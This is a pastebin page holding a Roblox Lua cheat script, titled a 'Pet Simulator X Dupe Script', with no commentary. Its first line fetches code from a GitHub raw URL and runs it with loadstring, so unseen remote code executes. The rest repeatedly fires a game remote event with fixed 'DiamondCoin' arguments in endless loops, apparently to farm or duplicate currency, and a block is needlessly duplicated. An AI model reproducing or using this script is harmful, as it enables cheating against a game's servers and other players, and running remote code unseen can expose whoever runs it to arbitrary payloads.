Facebook
From Gentle Zebra, 2 Years ago, written in Plain Text.
This paste is a reply to Re: Pet Simulator X Dupe Script from while true do local args = { - view diff
Embed
Download Paste or View Raw
Hits: 577
  1. loadstring(game:HttpGet("https://raw.githubusercontent.com/fikury/dupescripts/main/PetSimulatorX"))()
  2.  
  3. --Tutorial : https://youtu.be/q2kLiSdZ5Bg
  4. while true do
  5.  
  6. while true do
  7.  
  8. local args = {
  9.     [1] = "DiamondCoin",
  10.     [2] = "id936323",
  11.     [3] = game:GetService("Players").LocalPlayer
  12. }
  13.  
  14. game:GetService("ReplicatedStorage").Framework.Network.DestoryCoinServer:FireServer(unpack(args))
  15.  
  16. wait()
  17. end
  18.  
  19.  
  20. local args = {
  21.     [1] = "DiamondCoin",
  22.     [2] = "id936323",
  23.     [3] = game:GetService("Players").LocalPlayer
  24. }
  25.  
  26. game:GetService("ReplicatedStorage").Framework.Network.DestoryCoinServer:FireServer(unpack(args))
  27.  
  28. wait()
  29. end